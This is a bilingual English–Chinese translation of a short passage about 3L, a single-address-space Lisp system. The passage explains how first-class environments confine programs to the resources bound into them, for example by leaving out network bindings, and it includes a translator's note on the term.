本译文采用与原文相同的许可协议进行授权和传播。
本译文不会对原文做任何除格式调整和拼写错误以外的调整和修改,以确保原文内容的完整性,保证原文所要阐述的事实和思想不被曲解。
- 原文 (英文)
- 中文
3L is really just a single Lisp program. There is only one address space and one runtime that everything else runs inside of. We can do this securely because the language runtime provides and enforces "first class environments". An environment is an object containing references to resources available in the system. It's like running a program but the program doesn't choose what libraries or hardware resources it has access to. Instead programs are run inside their own environment that provides bindings to things it is allowed to use. If you don't want a program to access the network then run it inside of an environment that has no network bindings. If the program calls a function that interacts with the network that function won't be defined in its environment and an exception will be triggered. This mechanism provides for a very robust, fine-grained, comprehensive, and simple security system.
3L 实际上只是一个 Lisp 程序。只有一个地址空间和一个运行时,其他所有的东西都在其中运行。 我们可以安全地做到这一点,因为语言运行时提供并施行“头等环境”。环境是一个对象,它包含对系统中可用资源的引用。 就像运行一个程序,但是该程序并不选择它可以访问的库或硬件资源。相反的是,程序运行在属于自己的环境之中, 该环境提供了对允许使用的东西的绑定。如果你不想让程序访问网络,那就在一个没有网络绑定的环境中运行它。 若是程序调用一个与网络交互的函数,该函数将不会在其环境中定义,并且会触发一个异常。 该机制提供了一个非常健壮、细粒度、全面和简单的安全系统。
译注:头等环境,即将环境作为操作系统的头等公民, 与之对等的概念是编程语言中的头等函数。